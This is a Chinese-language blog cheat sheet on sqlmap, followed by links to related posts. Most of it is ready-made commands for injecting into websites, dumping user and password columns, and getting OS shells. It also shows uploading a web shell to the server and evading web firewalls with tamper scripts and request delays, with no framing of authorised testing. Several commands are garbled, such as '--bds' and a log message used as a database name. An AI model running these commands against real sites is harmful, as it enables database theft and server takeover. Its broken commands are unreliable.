sqlmap笔记本
/*
转载请注明出处
ID:珍惜少年时
*/
相关命令
--current-user #当前数据库用户
--privileges #查看当前数据库权限
--dbms=mssql #指定数据库的类型
--os-shell #执行cmd命令
--is-dba #判断是否为dba权限
Mysql注入
sqlmap -u url --dbs #获取数据库
sqlmap -u url -D 数据库名 --tables #猜表
sqlmap -u url -D 数据库名 -T 表名 --columns #获取字段
sqlmap -u url -D 数据库名 -T 表名 -C id,user,password --dump #获取字段内容
Mssql
sqlmap -u url --dbs #获取数据库
sqlmap -u url -D 数据库名 --tables #猜表
sqlmap -u url -D 数据库名 -T 表名 --columns #获取字段
sqlmap -u url -D 数据库名 -T 表名 -C id,user,password --dump #获取字段内容
Access 注入
sqlmap -u “url” #判断是否存在注入点
sqlmap -u “url” --tables #跑表
sqlmap -u “url” --columns -T 表名 #猜字段
sqlmap -u “url” --dump -T 表名 -C 字段名1,字段名2 #猜字段内容
cookie注入
sqlmap –u “url” –cookie “id=urlid” --table –level 2 #获取表名
sqlmap –u “url” –cookie “id=urlid” --columns –T 表名 –level 2 #获取字段
sqlmap –u “url” –cookie “id=urlid” --dump –T表名 –C “字段名1,字段名2” –level 2 #获取字段内容
post登录框注入
sqlmap –u “url” –forms 自动搜索 代码参数
./sqlmap.py -u “url” –data “ftuname=1&tfupass=1”r
交互写shell及命令执行
./sqlmap.py -u “url” –os –cmd=ipconfig #搞到cmd权限
./sqlmap.py -u “url” –os –shell
伪静态注入
sqlmap -u http://www.test.com/1*.html --dbs #获取数据库
sqlmap -u http://www.test.com/1*.html -D 数据库名 --tables #猜表
sqlmap -u http://www.test.com/1*.html -D 数据库名 -T 表名 --columns #获取字段
sqlmap -u http://www.test.com/1*.html -D 数据库名 -T 表名 -C id,user,password --dump #获取字段内容
请求延时
#参数 –delay --safe-freq 3
sqlmap --dbs -u http://www.test.com/1*.html --delay 时间自定 #获取数据库
sqlmap --dbs -u http://www.test.com/1*.html --safe-freq 次数 #获取数据库
搜索框注入/搜索框post注入
● 检测是否存在注入
● 第一步:在框内提交:%'
● 返回错误即存在注入!
● 第二步:然后抓包-例如抓包数据如下
POST /CN/Search/ HTTP/1.1
Host: www.xxxxx.com
Proxy-Connection: keep-alive
Content-Length: 21
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.xxxxx.com
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.xxxxx.com/CN/Search/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDCSTSSBDB=DEBHEMHCINDPHGHHPNEBJHEO; _ga=GA1.2.186656237.1405421193; CNZZDATA3440547=cnzz_eid%3D456311074-1405421237-http%253A%252F%252Fwww.xxxxx.com%252F%26ntime%3D1405426801 KeyWords=1%25&x=0&y=0 将抓到的数据包保存为文本(目录需记住,例如我将数据包保存文本到C盘命名为1.txt) 3.>sqlmap打开 执行命令:sqlmap.py -r c:1.txt --bds -v 2 //列数据库 回车后在以后一行得到数据"shutting down at 20:24:05" sqlmap.py -r c:1.txt --tables -D "shutting down at 20:24:05" -v 2 //列表明,假设表明为admin sqlmap.py -r c:1.txt --columns -T "admin" -D "shutting down at 20:24:05" -v 2 //奔字段,假设字段是username和password sqlmap.py -r c:1.txt --dump -C "username.password" -T "admin" -D "shutting down at 20:24:05" -v 2
tamper插件的使用/WAFBYPASS/Bypasswaf/waf bypass/
参数:
● batch 要求不对目标写入
● tamper 干预脚本
sqlmap.py -u "url" -v 3 --batch --tamper "base64encode.py"
注:base64encode.py 为编码,在tamper目录下。且等级必须是3级或以上。
tamper脚本下载:https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/
temper脚本:
针对MYSQL:space2morehash.py space2hash.py
空格替换:space2mssqlblank.py space2mysqlblank.py、
打乱编码:charencode.py chardoubleencode.py
针对asp/asp.net:charunicodeencode.py percentage.py
file参数的使用/写入
file-write 本地路径
file-dest 网站路径
sqlmap.py -u "url" --file-write=本地shell路径 --file-dest=网站物理路径/hello.asp
注:
● 需要有dba或sa或root权限
● 路径须是正斜杠(/)
SQLMAP脱裤
--dump-all #会在系统缓存目录C:\Users\Administrator\.sqlmap\output 目录下生成XLS文件
设置线程
--threads 10
sqlmap -u "
www.xxx.com/index.php/Index/view/id/40*.html" --dbs --delay 5 //间隔5秒请求一次
sqlmap怎么指定使用 https
回答:--force-ssl
待更新....
sqlmap笔记本的更多相关文章
- 使用SQLMAP对网站和数据库进行SQL注入攻击
from:http://www.blackmoreops.com/2014/05/07/use-sqlmap-sql-injection-hack-website-database/ 0x00 背景介 ...
- 使用sqlmap
实验环境要求: 1.安装win7或win10的笔记本或PC电脑一台,硬盘100GB,内存8GB 2.安装VMware Workstation 14以上 总体目标:基于centos7搭建dvwa web ...
- 关于sqlmap的使用
好记性不如烂笔头,记录一下. 带cookie的注入 python sqlmap.py -u "http://www.xxx.com?id=1" --cookie="coo ...
- 设置Fn键 笔记本直接按F1-F12 无须按Fn键 Fn+F12改F12(联想小新300为例)
最近公司给配的笔记本联想小新300 80RT i7-6500U 4G内存 500G机械,后加装120G固态+4G内存 这样就感觉还不错了. 在使用这本子的时候,去了Win10,强行装了Win7.无线 ...
- SQLMap Tamper Scripts Update 04/July/2016
SQLMap Tamper Scripts Update apostrophemask.py Replaces apostrophe character with its UTF-8 full wid ...
- 定制sqlmap tamper脚本
前言 渗透测试过程中遇到注入点常常丢到sqlmap中进行测试,假如网站有waf,sqlmap便无法直接注入了. 测试 在测试某个项目的过程中,一个页面的aid参数,习惯性的提交 and 1=1发现直接 ...
- sqlmap --dns-domain模拟实践
因为看到乌云的这一篇文章 http://drop.xbclub.org/static/drops/tips-5283.html 里面的提到的用sqlmap 的--dns-domain 进行dns 注入 ...
- 防止sql注入和sqlmap介绍
sql注入问题从WEB诞生到现在也一直没停过,各种大小公司都出现过sql注入问题,导致被拖库,然后存在社工库撞库等一系列影响. 防止sql注入个人理解最主要的就一点,那就是变量全部参数化,能根本的解决 ...
- sqlmap 帮助信息
Usage: sqlmap.py [options] 选项: -h, --help 显示基本的帮助信息并退出 -hh 显示高级的帮助信息并退出 --version 显示程序版本号并退出 -v VERB ...
随机推荐
- css011 表格和表单的格式化
css011 表格和表单的格式化 一. 让表格专司其职 Html中创建一个三行三列的表格 <table> <caption align="bottom" ...
- 加载信息,先从数据库取出5条实现分页,鼠标向上滑动触发Ajax再加载5条,达到异步刷新,优化加载。。。
php数据库取数据 <?php include("conn1.php"); include('../function/functions.php'); $page=intva ...
- 初识Hadoop二,文件操作
1.使用hadoop命令查看hdfs下文件 [root@localhost hadoop-2.7.3]# hadoop fs -ls hdfs://192.168.36.134:9000/ 开始在se ...
- /etc/profile、/etc/bashrc、~/.bash_profile、~/.bashrc 的区别(转)
/etc/profile:此文件为系统的每个用户设置环境信息,当用户第一次登录时,该文件被执行并从/etc/profile.d目录的配置文件中搜集shell的设置. /etc/bashrc:为每一个运 ...
- Construct Bounding Sphere
点集的包围球 http://en.wikipedia.org/wiki/Bounding_sphere http://blogs.agi.com/insight3d/index.php/2008/02 ...
- JAVA GUI随笔
Java的布局管理器提供了一种层面的抽象,自动将用户界面映射到所有的窗口系统.GUI组件放置在容器中,它们的位置由容器的布局管理器来管理. 布局管理器是使用布局管理器类创建的. 注:同一个对象无论添加 ...
- Ubuntu用作Server时出现乱码的解决方法
下面给出解决办法: 1.用vi编辑器修改/etc/default/local文件 2.把原来的中文编码替换成下面的 LANG="en_US.UTF-8" LANGUAGE=&quo ...
- 为什么要做url encode
因为 url 对字符有限制,比如把一个邮箱放入 url,就需要使用 urlencode 函数,因为 url 中不能包含 @ 字符.
- Orchard源码分析(5):Host相关(Orchard.Environment.DefaultOrchardHost类)
概述 Host 是应用程序域级的单例,代表了Orchard应用程序.其处理应用程序生命周期中的初始化.BeginRequest事件.EndRequest事件等. 可以简单理解为HttpApplicat ...
- Jetty与tomcat的比较
Google 应用系统引擎最初是以 Apache Tomcat 作为其 webserver/servlet 容器的,但最终将切换到 Jetty 上. 这个决定让许多开发人员都诧异的想问:为什么要做这样 ...